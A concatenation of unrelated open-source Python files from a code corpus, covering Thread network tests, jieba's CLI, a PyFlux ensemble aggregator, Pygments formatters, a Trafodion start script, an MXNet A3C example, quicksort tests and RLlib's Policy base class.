self.nodes[LEADER].add_prefix('2001:2:0:1::/64', 'paros')
self.nodes[LEADER].add_prefix('2001:2:0:2::/64', 'paro')
self.nodes[LEADER].register_netdata()
self.nodes[ROUTER].start()
time.sleep(5)
self.assertEqual(self.nodes[ROUTER].get_state(), 'router')
self.nodes[SED1].start()
time.sleep(5)
self.assertEqual(self.nodes[SED1].get_state(), 'child')
self.nodes[ED1].start()
time.sleep(5)
self.assertEqual(self.nodes[ED1].get_state(), 'child')
addrs = self.nodes[SED1].get_addrs()
self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs))
self.assertFalse(any('2001:2:0:2' in addr[0:10] for addr in addrs))
for addr in addrs:
if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2':
self.assertTrue(self.nodes[LEADER].ping(addr))
addrs = self.nodes[ED1].get_addrs()
self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs))
self.assertTrue(any('2001:2:0:2' in addr[0:10] for addr in addrs))
for addr in addrs:
if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2':
self.assertTrue(self.nodes[LEADER].ping(addr))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
lsqtongxin/jieba | jieba/__main__.py | 60 | 1938 | """Jieba command line interface."""
import sys
import jieba
from argparse import ArgumentParser
from ._compat import *
parser = ArgumentParser(usage="%s -m jieba [options] filename" % sys.executable, description="Jieba command line interface.", epilog="If no filename specified, use STDIN instead.")
parser.add_argument("-d", "--delimiter", metavar="DELIM", default=' / ',
nargs='?', const=' ',
help="use DELIM instead of ' / ' for word delimiter; or a space if it is used without DELIM")
parser.add_argument("-D", "--dict", help="use DICT as dictionary")
parser.add_argument("-u", "--user-dict",
help="use USER_DICT together with the default dictionary or DICT (if specified)")
parser.add_argument("-a", "--cut-all",
action="store_true", dest="cutall", default=False,
help="full pattern cutting")
parser.add_argument("-n", "--no-hmm", dest="hmm", action="store_false",
default=True, help="don't use the Hidden Markov Model")
parser.add_argument("-q", "--quiet", action="store_true", default=False,
help="don't print loading messages to stderr")
parser.add_argument("-V", '--version', action='version',
version="Jieba " + jieba.__version__)
parser.add_argument("filename", nargs='?', help="input file")
args = parser.parse_args()
if args.quiet:
jieba.setLogLevel(60)
delim = text_type(args.delimiter)
cutall = args.cutall
hmm = args.hmm
fp = open(args.filename, 'r') if args.filename else sys.stdin
if args.dict:
jieba.initialize(args.dict)
else:
jieba.initialize()
if args.user_dict:
jieba.load_userdict(args.user_dict)
ln = fp.readline()
while ln:
l = ln.rstrip('\r\n')
result = delim.join(jieba.cut(ln.rstrip('\r\n'), cutall, hmm))
if PY2:
result = result.encode(default_encoding)
print(result)
ln = fp.readline()
fp.close()
| mit |
RJT1990/pyflux | pyflux/ensembles/mixture_of_experts.py | 1 | 12285 | import pandas as pd
import numpy as np
class Aggregate():
""" Aggregation Algorithm
Parameters
----------
learning_rate : float
Learning rate for the Aggregation algorithm
loss_type : string
'absolute' or 'squared'
match_window : int
(default: 10) how many of the observations at the end of a model time
series to assess whether the data being used in each model is the same
"""
def __init__(self, learning_rate=1.0, loss_type='absolute', match_window=10):
self.learning_rate = learning_rate
self.data = []
self.model_list = []
self.model_names = []
self.match_window = match_window
self.model_predictions_is = []
self.model_predictions = []
if loss_type == 'absolute':
self.loss_type = self.absolute_loss
self.loss_name = 'Absolute Loss'
elif loss_type == 'squared':
self.loss_type = self.squared_loss
self.loss_name = 'Squared Loss'
else:
raise ValueError('Unidentified loss type entered!')
self.supported_models = ['EGARCH', 'EGARCHM', 'EGARCHMReg', 'GARCH', 'LMEGARCH', 'LMSEGARCH', 'SEGARCH', 'SEGARCHM', 'GAS', 'ARIMA', 'ARIMAX', 'GASLLEV', 'GASLLT', 'GASReg', 'GASX', 'GPNARX', 'LLEV', 'LLT', 'DynReg']
@staticmethod
def absolute_loss(data, predictions):
""" Calculates absolute loss
Parameters
----------
data : np.ndarray
Univariate data
predictions : np.ndarray
Univariate predictions
Returns
----------
- np.ndarray of the absolute loss
"""
return np.abs(data-predictions)
@staticmethod
def squared_loss(data, predictions):
""" Calculates squared loss
Parameters
----------
data : np.ndarray
Univariate data
predictions : np.ndarray
Univariate predictions
Returns
----------
- np.ndarray of the squared loss
"""
return np.square(data-predictions)
def add_model(self, model):
""" Adds a PyFlux model to the aggregating algorithm
Parameters
----------
model : pf.[MODEL]
A PyFlux univariate model
Returns
----------
- Void (changes self.model_list)
"""
if model.model_type not in self.supported_models:
raise ValueError('Model type not supported for Aggregate! Apologies')
if not self.model_list:
self.model_list.append(model)
if model.model_type in ['EGARCH', 'EGARCHM', 'EGARCHMReg', 'GARCH', 'LMEGARCH', 'LMSEGARCH', 'SEGARCH', 'SEGARCHM']:
self.data = np.abs(model.data)
else:
self.data = model.data
self.index = model.index
else:
if model.model_type in ['EGARCH', 'EGARCHM', 'EGARCHMReg', 'GARCH', 'LMEGARCH', 'LMSEGARCH', 'SEGARCH', 'SEGARCHM']:
if np.isclose(np.abs(np.abs(model.data[-self.match_window:])-self.data[-self.match_window:]).sum(),0.0) or model.model_type=='GPNARX':
self.model_list.append(model)
else:
raise ValueError('Data entered is deemed different based on %s last values!' % (s))
else:
if np.isclose(np.abs(model.data[-self.match_window:]-self.data[-self.match_window:]).sum(),0.0) or model.model_type=='GPNARX':
self.model_list.append(model)
else:
raise ValueError('Data entered is deemed different based on %s last values!' % (s))
self.model_names = [i.model_name for i in self.model_list]
def _model_predict(self, h, recalculate=False, fit_once=True):
""" Outputs ensemble model predictions for out-of-sample data
Parameters
----------
h : int
How many steps at the end of the series to run the ensemble on
recalculate: boolean
Whether to recalculate the predictions or not
fit_once : boolean
Whether to fit the model once at the beginning, or with every iteration
Returns
----------
- pd.DataFrame of the model predictions, index of dates
"""
if len(self.model_predictions) == 0 or h != self.h or recalculate is True:
for no, model in enumerate(self.model_list):
if no == 0:
model.fit()
result = model.predict(h)
self.predict_index = result.index
result.columns = [model.model_name]
else:
model.fit()
new_frame = model.predict(h)
new_frame.columns = [model.model_name]
result = pd.concat([result,new_frame], axis=1)
self.model_predictions = result
self.h = h
return result, self.predict_index
else:
return self.model_predictions, self.predict_index
def _model_predict_is(self, h, recalculate=False, fit_once=True):
""" Outputs ensemble model predictions for the end-of-period data
Parameters
----------
h : int
How many steps at the end of the series to run the ensemble on
recalculate: boolean
Whether to recalculate the predictions or not
fit_once : boolean
Whether to fit the model once at the beginning, or with every iteration
Returns
----------
- pd.DataFrame of the model predictions, index of dates
"""
if len(self.model_predictions_is) == 0 or h != self.h or recalculate is True:
for no, model in enumerate(self.model_list):
if no == 0:
result = model.predict_is(h, fit_once=fit_once)
result.columns = [model.model_name]
else:
new_frame = model.predict_is(h, fit_once=fit_once)
new_frame.columns = [model.model_name]
result = pd.concat([result,new_frame], axis=1)
self.model_predictions_is = result
self.h = h
return result
else:
return self.model_predictions_is
def _construct_losses(self, data, predictions, ensemble_prediction):
""" Construct losses for the ensemble and each constitute model
Parameters
----------
data: np.ndarray
The univariate time series
predictions : np.ndarray
The predictions of each constitute model
ensemble_prediction : np.ndarray
The prediction of the ensemble model
Returns
----------
- np.ndarray of the losses for each model
"""
losses = []
losses.append(self.loss_type(data, ensemble_prediction).sum()/data.shape[0])
for model in range(len(self.model_list)):
losses.append(self.loss_type(data, predictions[:,model]).sum()/data.shape[0])
return losses
def tune_learning_rate(self, h, parameter_list=None):
""" Naive tuning of the the learning rate on the in-sample data
Parameters
----------
h : int
How many steps to run Aggregate on
parameter_list: list
List of parameters to search for a good learning rate over
Returns
----------
- Void (changes self.learning_rate)
"""
if parameter_list is None:
parameter_list = [0.001, 0.01, 0.1, 1.0, 10.0, 100.0, 1000.0, 10000.0,100000.0]
for parameter in parameter_list:
self.learning_rate = parameter
_, losses, _ = self.run(h, recalculate=False)
loss = losses[0]
if parameter == parameter_list[0]:
best_rate = parameter
best_loss = loss
else:
if loss < best_loss:
best_loss = loss
best_rate = parameter
self.learning_rate = best_rate
def run(self, h, recalculate=False):
""" Run the aggregating algorithm
Parameters
----------
h : int
How many steps to run the aggregating algorithm on
recalculate: boolean
Whether to recalculate the predictions or not
Returns
----------
- np.ndarray of normalized weights, np.ndarray of losses for each model
"""
data = self.data[-h:]
predictions = self._model_predict_is(h, recalculate=recalculate).values
weights = np.zeros((h, len(self.model_list)))
normalized_weights = np.zeros((h, len(self.model_list)))
ensemble_prediction = np.zeros(h)
for t in range(h):
if t == 0:
weights[t,:] = 100000
ensemble_prediction[t] = np.dot(weights[t,:]/weights[t,:].sum(), predictions[t,:])
weights[t,:] = weights[t,:]*np.exp(-self.learning_rate*self.loss_type(data[t], predictions[t,:]))
normalized_weights[t,:] = weights[t,:]/weights[t,:].sum()
else:
ensemble_prediction[t] = np.dot(weights[t-1,:]/weights[t-1,:].sum(), predictions[t,:])
weights[t,:] = weights[t-1,:]*np.exp(-self.learning_rate*self.loss_type(data[t], predictions[t,:]))
normalized_weights[t,:] = weights[t,:]/weights[t,:].sum()
return normalized_weights, self._construct_losses(data, predictions, ensemble_prediction), ensemble_prediction
def plot_weights(self, h, **kwargs):
""" Plot the weights from the aggregating algorithm
Parameters
----------
h : int
How many steps to run the aggregating algorithm on
Returns
----------
- A plot of the weights for each model constituent over time
"""
import matplotlib.pyplot as plt
import seaborn as sns
figsize = kwargs.get('figsize',(10,7))
weights, _, _ = self.run(h=h)
plt.figure(figsize=figsize)
plt.plot(self.index[-h:],weights)
plt.legend(self.model_names)
plt.show()
def predict(self, h, h_train=40):
""" Run out-of-sample predicitons for Aggregate algorithm
(This only works for non-exogenous variable models currently)
Parameters
----------
h : int
How many out-of-sample steps to run the aggregating algorithm on
h_train : int
How many in-sample steps to warm-up the ensemble weights on
Returns
----------
- pd.DataFrame of Aggregate out-of-sample predictions
"""
predictions, index = self._model_predict(h)
normalized_weights = self.run(h=h_train)[0][-1, :]
ensemble_prediction = np.zeros(h)
for t in range(h):
ensemble_prediction[t] = np.dot(normalized_weights, predictions.values[t,:])
result = pd.DataFrame(ensemble_prediction)
result.index = index
return result
def predict_is(self, h):
""" Outputs predictions for the Aggregate algorithm on the in-sample data
Parameters
----------
h : int
How many steps to run the aggregating algorithm on
Returns
----------
- pd.DataFrame of ensemble predictions
"""
result = pd.DataFrame([self.run(h=h)[2]]).T
result.index = self.index[-h:]
return result
def summary(self, h):
"""
Summarize the results for each model for h steps of the algorithm
Parameters
----------
h : int
How many steps to run the aggregating algorithm on
Returns
----------
- pd.DataFrame of losses for each model
"""
_, losses, _ = self.run(h=h)
df = pd.DataFrame(losses)
df.index = ['Ensemble'] + self.model_names
df.columns = [self.loss_name]
return df
| bsd-3-clause |
n1k0/SublimeHighlight | pygments/formatters/other.py | 363 | 3811 | # -*- coding: utf-8 -*-
"""
pygments.formatters.other
~~~~~~~~~~~~~~~~~~~~~~~~~
Other formatters: NullFormatter, RawTokenFormatter.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.formatter import Formatter
from pygments.util import OptionError, get_choice_opt, b
from pygments.token import Token
from pygments.console import colorize
__all__ = ['NullFormatter', 'RawTokenFormatter']
class NullFormatter(Formatter):
"""
Output the text unchanged without any formatting.
"""
name = 'Text only'
aliases = ['text', 'null']
filenames = ['*.txt']
def format(self, tokensource, outfile):
enc = self.encoding
for ttype, value in tokensource:
if enc:
outfile.write(value.encode(enc))
else:
outfile.write(value)
class RawTokenFormatter(Formatter):
r"""
Format tokens as a raw representation for storing token streams.
The format is ``tokentype<TAB>repr(tokenstring)\n``. The output can later
be converted to a token stream with the `RawTokenLexer`, described in the
`lexer list <lexers.txt>`_.
Only two options are accepted:
`compress`
If set to ``'gz'`` or ``'bz2'``, compress the output with the given
compression algorithm after encoding (default: ``''``).
`error_color`
If set to a color name, highlight error tokens using that color. If
set but with no value, defaults to ``'red'``.
*New in Pygments 0.11.*
"""
name = 'Raw tokens'
aliases = ['raw', 'tokens']
filenames = ['*.raw']
unicodeoutput = False
def __init__(self, **options):
Formatter.__init__(self, **options)
if self.encoding:
raise OptionError('the raw formatter does not support the '
'encoding option')
self.encoding = 'ascii' # let pygments.format() do the right thing
self.compress = get_choice_opt(options, 'compress',
['', 'none', 'gz', 'bz2'], '')
self.error_color = options.get('error_color', None)
if self.error_color is True:
self.error_color = 'red'
if self.error_color is not None:
try:
colorize(self.error_color, '')
except KeyError:
raise ValueError("Invalid color %r specified" %
self.error_color)
def format(self, tokensource, outfile):
try:
outfile.write(b(''))
except TypeError:
raise TypeError('The raw tokens formatter needs a binary '
'output file')
if self.compress == 'gz':
import gzip
outfile = gzip.GzipFile('', 'wb', 9, outfile)
def write(text):
outfile.write(text.encode())
flush = outfile.flush
elif self.compress == 'bz2':
import bz2
compressor = bz2.BZ2Compressor(9)
def write(text):
outfile.write(compressor.compress(text.encode()))
def flush():
outfile.write(compressor.flush())
outfile.flush()
else:
def write(text):
outfile.write(text.encode())
flush = outfile.flush
if self.error_color:
for ttype, value in tokensource:
line = "%s\t%r\n" % (ttype, value)
if ttype is Token.Error:
write(colorize(self.error_color, line))
else:
write(line)
else:
for ttype, value in tokensource:
write("%s\t%r\n" % (ttype, value))
flush()
| mit |
mashengchen/incubator-trafodion | install/python-installer/scripts/traf_start.py | 1 | 2747 | #!/usr/bin/env python
# @@@ START COPYRIGHT @@@
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# @@@ END COPYRIGHT @@@
### this script should be run on first node with trafodion user ###
import sys
import time
import os
import json
from common import cmd_output, run_cmd, err
def run():
""" start trafodion instance """
dbcfgs = json.loads(dbcfgs_json)
print 'Starting trafodion'
traf_home = os.environ['TRAF_HOME']
if os.path.exists('%s/sql/scripts/trafstart' % traf_home):
run_cmd('trafstart')
else:
run_cmd('sqstart')
# set a uniq file name
tmp_file = '/tmp/initialize.out.' + str(int(time.time()))
print 'Initialize trafodion'
run_cmd('echo "initialize trafodion;" | sqlci > %s' % tmp_file)
init_output = cmd_output('cat %s' % tmp_file)
# error 1392, 1395
if '1392' in init_output or '1395' in init_output:
run_cmd('echo "get version of metadata;" | sqlci > %s' % tmp_file)
meta_current = cmd_output('grep \'Metadata is current\' %s | wc -l' % tmp_file)
if meta_current != "1":
print 'Initialize trafodion, upgrade'
run_cmd('echo "initialize trafodion, upgrade;" | sqlci > %s' % tmp_file)
# other errors
elif 'ERROR' in init_output:
err('Failed to initialize trafodion:\n %s' % init_output)
run_cmd('rm -rf %s' % tmp_file)
if dbcfgs['ldap_security'] == 'Y':
run_cmd('echo "initialize authorization; alter user DB__ROOT set external name \\\"%s\\\";" | sqlci > %s' % (dbcfgs['db_root_user'], tmp_file))
secure_output = cmd_output('cat %s' % tmp_file)
if 'ERROR' in secure_output:
err('Failed to setup security for trafodion:\n %s' % secure_output)
run_cmd('rm -rf %s' % tmp_file)
if os.path.exists('%s/sql/scripts/connstart' % traf_home):
run_cmd('connstart')
print 'Start trafodion successfully.'
# main
try:
dbcfgs_json = sys.argv[1]
except IndexError:
err('No db config found')
run()
| apache-2.0 |
arank/mxnet | example/reinforcement-learning/a3c/a3c.py | 15 | 8861 | from __future__ import print_function
import mxnet as mx
import numpy as np
import rl_data
import sym
import argparse
import logging
import os
import gym
from datetime import datetime
import time
parser = argparse.ArgumentParser(description='Traing A3C with OpenAI Gym')
parser.add_argument('--test', action='store_true', help='run testing', default=False)
parser.add_argument('--log-file', type=str, help='the name of log file')
parser.add_argument('--log-dir', type=str, default="./log", help='directory of the log file')
parser.add_argument('--model-prefix', type=str, help='the prefix of the model to load')
parser.add_argument('--save-model-prefix', type=str, help='the prefix of the model to save')
parser.add_argument('--load-epoch', type=int, help="load the model on an epoch using the model-prefix")
parser.add_argument('--kv-store', type=str, default='device', help='the kvstore type')
parser.add_argument('--gpus', type=str, help='the gpus will be used, e.g "0,1,2,3"')
parser.add_argument('--num-epochs', type=int, default=120, help='the number of training epochs')
parser.add_argument('--num-examples', type=int, default=1000000, help='the number of training examples')
parser.add_argument('--batch-size', type=int, default=32)
parser.add_argument('--input-length', type=int, default=4)
parser.add_argument('--lr', type=float, default=0.0001)
parser.add_argument('--wd', type=float, default=0)
parser.add_argument('--t-max', type=int, default=4)
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--beta', type=float, default=0.08)
args = parser.parse_args()
def log_config(log_dir=None, log_file=None, prefix=None, rank=0):
reload(logging)
head = '%(asctime)-15s Node[' + str(rank) + '] %(message)s'
if log_dir:
logging.basicConfig(level=logging.DEBUG, format=head)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
if not log_file:
log_file = (prefix if prefix else '') + datetime.now().strftime('_%Y_%m_%d-%H_%M.log')
log_file = log_file.replace('/', '-')
else:
log_file = log_file
log_file_full_name = os.path.join(log_dir, log_file)
handler = logging.FileHandler(log_file_full_name, mode='w')
formatter = logging.Formatter(head)
handler.setFormatter(formatter)
logging.getLogger().addHandler(handler)
logging.info('start with arguments %s', args)
else:
logging.basicConfig(level=logging.DEBUG, format=head)
logging.info('start with arguments %s', args)
def train():
# kvstore
kv = mx.kvstore.create(args.kv_store)
model_prefix = args.model_prefix
if model_prefix is not None:
model_prefix += "-%d" % (kv.rank)
save_model_prefix = args.save_model_prefix
if save_model_prefix is None:
save_model_prefix = model_prefix
log_config(args.log_dir, args.log_file, save_model_prefix, kv.rank)
devs = mx.cpu() if args.gpus is None else [
mx.gpu(int(i)) for i in args.gpus.split(',')]
epoch_size = args.num_examples / args.batch_size
if args.kv_store == 'dist_sync':
epoch_size /= kv.num_workers
# disable kvstore for single device
if 'local' in kv.type and (
args.gpus is None or len(args.gpus.split(',')) is 1):
kv = None
# module
dataiter = rl_data.GymDataIter('Breakout-v0', args.batch_size, args.input_length, web_viz=True)
net = sym.get_symbol_atari(dataiter.act_dim)
module = mx.mod.Module(net, data_names=[d[0] for d in dataiter.provide_data], label_names=('policy_label', 'value_label'), context=devs)
module.bind(data_shapes=dataiter.provide_data,
label_shapes=[('policy_label', (args.batch_size,)), ('value_label', (args.batch_size, 1))],
grad_req='add')
# load model
if args.load_epoch is not None:
assert model_prefix is not None
_, arg_params, aux_params = mx.model.load_checkpoint(model_prefix, args.load_epoch)
else:
arg_params = aux_params = None
# save model
checkpoint = None if save_model_prefix is None else mx.callback.do_checkpoint(save_model_prefix)
init = mx.init.Mixed(['fc_value_weight|fc_policy_weight', '.*'],
[mx.init.Uniform(0.001), mx.init.Xavier(rnd_type='gaussian', factor_type="in", magnitude=2)])
module.init_params(initializer=init,
arg_params=arg_params, aux_params=aux_params)
# optimizer
module.init_optimizer(kvstore=kv, optimizer='adam',
optimizer_params={'learning_rate': args.lr, 'wd': args.wd, 'epsilon': 1e-3})
# logging
np.set_printoptions(precision=3, suppress=True)
T = 0
dataiter.reset()
score = np.zeros((args.batch_size, 1))
final_score = np.zeros((args.batch_size, 1))
for epoch in range(args.num_epochs):
if save_model_prefix:
module.save_params('%s-%04d.params'%(save_model_prefix, epoch))
for _ in range(epoch_size/args.t_max):
tic = time.time()
# clear gradients
for exe in module._exec_group.grad_arrays:
for g in exe:
g[:] = 0
S, A, V, r, D = [], [], [], [], []
for t in range(args.t_max + 1):
data = dataiter.data()
module.forward(mx.io.DataBatch(data=data, label=None), is_train=False)
act, _, val = module.get_outputs()
V.append(val.asnumpy())
if t < args.t_max:
act = act.asnumpy()
act = [np.random.choice(dataiter.act_dim, p=act[i]) for i in range(act.shape[0])]
reward, done = dataiter.act(act)
S.append(data)
A.append(act)
r.append(reward.reshape((-1, 1)))
D.append(done.reshape((-1, 1)))
err = 0
R = V[args.t_max]
for i in reversed(range(args.t_max)):
R = r[i] + args.gamma * (1 - D[i]) * R
adv = np.tile(R - V[i], (1, dataiter.act_dim))
batch = mx.io.DataBatch(data=S[i], label=[mx.nd.array(A[i]), mx.nd.array(R)])
module.forward(batch, is_train=True)
pi = module.get_outputs()[1]
h = -args.beta*(mx.nd.log(pi+1e-7)*pi)
out_acts = np.amax(pi.asnumpy(), 1)
out_acts=np.reshape(out_acts,(-1,1))
out_acts_tile=np.tile(-np.log(out_acts + 1e-7),(1, dataiter.act_dim))
module.backward([mx.nd.array(out_acts_tile*adv), h])
print('pi', pi[0].asnumpy())
print('h', h[0].asnumpy())
err += (adv**2).mean()
score += r[i]
final_score *= (1-D[i])
final_score += score * D[i]
score *= 1-D[i]
T += D[i].sum()
module.update()
logging.info('fps: %f err: %f score: %f final: %f T: %f'%(args.batch_size/(time.time()-tic), err/args.t_max, score.mean(), final_score.mean(), T))
print(score.squeeze())
print(final_score.squeeze())
def test():
log_config()
devs = mx.cpu() if args.gpus is None else [
mx.gpu(int(i)) for i in args.gpus.split(',')]
# module
dataiter = robo_data.RobosimsDataIter('scenes', args.batch_size, args.input_length, web_viz=True)
print(dataiter.provide_data)
net = sym.get_symbol_thor(dataiter.act_dim)
module = mx.mod.Module(net, data_names=[d[0] for d in dataiter.provide_data], label_names=('policy_label', 'value_label'), context=devs)
module.bind(data_shapes=dataiter.provide_data,
label_shapes=[('policy_label', (args.batch_size,)), ('value_label', (args.batch_size, 1))],
for_training=False)
# load model
assert args.load_epoch is not None
assert args.model_prefix is not None
module.load_params('%s-%04d.params'%(args.model_prefix, args.load_epoch))
N = args.num_epochs * args.num_examples / args.batch_size
R = 0
T = 1e-20
score = np.zeros((args.batch_size,))
for t in range(N):
dataiter.clear_history()
data = dataiter.next()
module.forward(data, is_train=False)
act = module.get_outputs()[0].asnumpy()
act = [np.random.choice(dataiter.act_dim, p=act[i]) for i in range(act.shape[0])]
dataiter.act(act)
time.sleep(0.05)
_, reward, _, done = dataiter.history[0]
T += done.sum()
score += reward
R += (done*score).sum()
score *= (1-done)
if t % 100 == 0:
logging.info('n %d score: %f T: %f'%(t, R/T, T))
if __name__ == '__main__':
if args.test:
test()
else:
train()
| apache-2.0 |
jay-tyler/data-structures | tests/test_quick_sort.py | 1 | 1061 | from dtypes.quick_sort import quisort
from random import shuffle
import pytest
def test_rand_quicksort():
tlist = range(500)
shuffle(tlist)
assert tlist != range(500)
quisort(tlist)
assert tlist == range(500)
def test_backward_quicksort():
tlist = range(500)
tlist.reverse()
quisort(tlist)
assert tlist == range(500)
def test_inorder_quicksort():
tlist = range(500)
quisort(tlist)
assert tlist == range(500)
def test_sameval_quicksort():
tlist = [3 for _ in range(500)]
quisort(tlist)
for item in tlist:
assert item == 3
def test_char_quicksort():
initlist = list('abcdefghijklmnopq')
tlist = initlist[:]
shuffle(tlist)
quisort(tlist)
assert tlist == initlist
def test_none_quicksort():
tlist = None
with pytest.raises(TypeError):
quisort(tlist)
def test_oneitemlist_quicksort():
tlist = [1]
quisort(tlist)
assert tlist == [1]
def test_oneitem_quicksort():
tlist = 1
with pytest.raises(TypeError):
quisort(tlist)
| mit |
atumanov/ray | python/ray/rllib/policy/policy.py | 1 | 10039 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import gym
from ray.rllib.utils.annotations import DeveloperAPI
# By convention, metrics from optimizing the loss can be reported in the
# `grad_info` dict returned by learn_on_batch() / compute_grads() via this key.
LEARNER_STATS_KEY = "learner_stats"
@DeveloperAPI
class Policy(object):
"""An agent policy and loss, i.e., a TFPolicy or other subclass.
This object defines how to act in the environment, and also losses used to
improve the policy based on its experiences. Note that both policy and
loss are defined together for convenience, though the policy itself is
logically separate.
All policies can directly extend Policy, however TensorFlow users may
find TFPolicy simpler to implement. TFPolicy also enables RLlib
to apply TensorFlow-specific optimizations such as fusing multiple policy
graphs and multi-GPU support.
Attributes:
observation_space (gym.Space): Observation space of the policy.
action_space (gym.Space): Action space of the policy.
"""
@DeveloperAPI
def __init__(self, observation_space, action_space, config):
"""Initialize the graph.
This is the standard constructor for policies. The policy
class you pass into RolloutWorker will be constructed with
these arguments.
Args:
observation_space (gym.Space): Observation space of the policy.
action_space (gym.Space): Action space of the policy.
config (dict): Policy-specific configuration data.
"""
self.observation_space = observation_space
self.action_space = action_space
@DeveloperAPI
def compute_actions(self,
obs_batch,
state_batches,
prev_action_batch=None,
prev_reward_batch=None,
info_batch=None,
episodes=None,
**kwargs):
"""Compute actions for the current policy.
Arguments:
obs_batch (np.ndarray): batch of observations
state_batches (list): list of RNN state input batches, if any
prev_action_batch (np.ndarray): batch of previous action values
prev_reward_batch (np.ndarray): batch of previous rewards
info_batch (info): batch of info objects
episodes (list): MultiAgentEpisode for each obs in obs_batch.
This provides access to all of the internal episode state,
which may be useful for model-based or multiagent algorithms.
kwargs: forward compatibility placeholder
Returns:
actions (np.ndarray): batch of output actions, with shape like
[BATCH_SIZE, ACTION_SHAPE].
state_outs (list): list of RNN state output batches, if any, with
shape like [STATE_SIZE, BATCH_SIZE].
info (dict): dictionary of extra feature batches, if any, with
shape like {"f1": [BATCH_SIZE, ...], "f2": [BATCH_SIZE, ...]}.
"""
raise NotImplementedError
@DeveloperAPI
def compute_single_action(self,
obs,
state,
prev_action=None,
prev_reward=None,
info=None,
episode=None,
clip_actions=False,
**kwargs):
"""Unbatched version of compute_actions.
Arguments:
obs (obj): single observation
state_batches (list): list of RNN state inputs, if any
prev_action (obj): previous action value, if any
prev_reward (int): previous reward, if any
info (dict): info object, if any
episode (MultiAgentEpisode): this provides access to all of the
internal episode state, which may be useful for model-based or
multi-agent algorithms.
clip_actions (bool): should the action be clipped
kwargs: forward compatibility placeholder
Returns:
actions (obj): single action
state_outs (list): list of RNN state outputs, if any
info (dict): dictionary of extra features, if any
"""
prev_action_batch = None
prev_reward_batch = None
info_batch = None
episodes = None
if prev_action is not None:
prev_action_batch = [prev_action]
if prev_reward is not None:
prev_reward_batch = [prev_reward]
if info is not None:
info_batch = [info]
if episode is not None:
episodes = [episode]
[action], state_out, info = self.compute_actions(
[obs], [[s] for s in state],
prev_action_batch=prev_action_batch,
prev_reward_batch=prev_reward_batch,
info_batch=info_batch,
episodes=episodes)
if clip_actions:
action = clip_action(action, self.action_space)
return action, [s[0] for s in state_out], \
{k: v[0] for k, v in info.items()}
@DeveloperAPI
def postprocess_trajectory(self,
sample_batch,
other_agent_batches=None,
episode=None):
"""Implements algorithm-specific trajectory postprocessing.
This will be called on each trajectory fragment computed during policy
evaluation. Each fragment is guaranteed to be only from one episode.
Arguments:
sample_batch (SampleBatch): batch of experiences for the policy,
which will contain at most one episode trajectory.
other_agent_batches (dict): In a multi-agent env, this contains a
mapping of agent ids to (policy, agent_batch) tuples
containing the policy and experiences of the other agent.
episode (MultiAgentEpisode): this provides access to all of the
internal episode state, which may be useful for model-based or
multi-agent algorithms.
Returns:
SampleBatch: postprocessed sample batch.
"""
return sample_batch
@DeveloperAPI
def learn_on_batch(self, samples):
"""Fused compute gradients and apply gradients call.
Either this or the combination of compute/apply grads must be
implemented by subclasses.
Returns:
grad_info: dictionary of extra metadata from compute_gradients().
Examples:
>>> batch = ev.sample()
>>> ev.learn_on_batch(samples)
"""
grads, grad_info = self.compute_gradients(samples)
self.apply_gradients(grads)
return grad_info
@DeveloperAPI
def compute_gradients(self, postprocessed_batch):
"""Computes gradients against a batch of experiences.
Either this or learn_on_batch() must be implemented by subclasses.
Returns:
grads (list): List of gradient output values
info (dict): Extra policy-specific values
"""
raise NotImplementedError
@DeveloperAPI
def apply_gradients(self, gradients):
"""Applies previously computed gradients.
Either this or learn_on_batch() must be implemented by subclasses.
"""
raise NotImplementedError
@DeveloperAPI
def get_weights(self):
"""Returns model weights.
Returns:
weights (obj): Serializable copy or view of model weights
"""
raise NotImplementedError
@DeveloperAPI
def set_weights(self, weights):
"""Sets model weights.
Arguments:
weights (obj): Serializable copy or view of model weights
"""
raise NotImplementedError
@DeveloperAPI
def get_initial_state(self):
"""Returns initial RNN state for the current policy."""
return []
@DeveloperAPI
def get_state(self):
"""Saves all local state.
Returns:
state (obj): Serialized local state.
"""
return self.get_weights()
@DeveloperAPI
def set_state(self, state):
"""Restores all local state.
Arguments:
state (obj): Serialized local state.
"""
self.set_weights(state)
@DeveloperAPI
def on_global_var_update(self, global_vars):
"""Called on an update to global vars.
Arguments:
global_vars (dict): Global variables broadcast from the driver.
"""
pass
@DeveloperAPI
def export_model(self, export_dir):
"""Export Policy to local directory for serving.
Arguments:
export_dir (str): Local writable directory.
"""
raise NotImplementedError
@DeveloperAPI
def export_checkpoint(self, export_dir):
"""Export Policy checkpoint to local directory.
Argument:
export_dir (str): Local writable directory.
"""
raise NotImplementedError
def clip_action(action, space):
"""Called to clip actions to the specified range of this policy.
Arguments:
action: Single action.
space: Action space the actions should be present in.
Returns:
Clipped batch of actions.
"""
if isinstance(space, gym.spaces.Box):
return np.clip(action, space.low, space.high)
elif isinstance(space, gym.spaces.Tuple):
if type(action) not in (tuple, list):
raise ValueError("Expected tuple space for actions {}: {}".format(
action, space))
out = []
for a, s in zip(action, space.spaces):
out.append(clip_action(a, s))
return out
else:
return action
| apache-2.0 |
maxamillion/openshift-ansible | roles/lib_openshift/library/oc_scale.py | 17 | 66770 | #!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
